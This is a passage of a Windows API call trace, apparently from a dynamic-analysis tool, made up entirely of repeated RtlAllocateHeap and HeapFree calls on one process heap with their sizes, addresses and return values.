RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.056] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.061] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.063] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.064] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.064] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.066] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 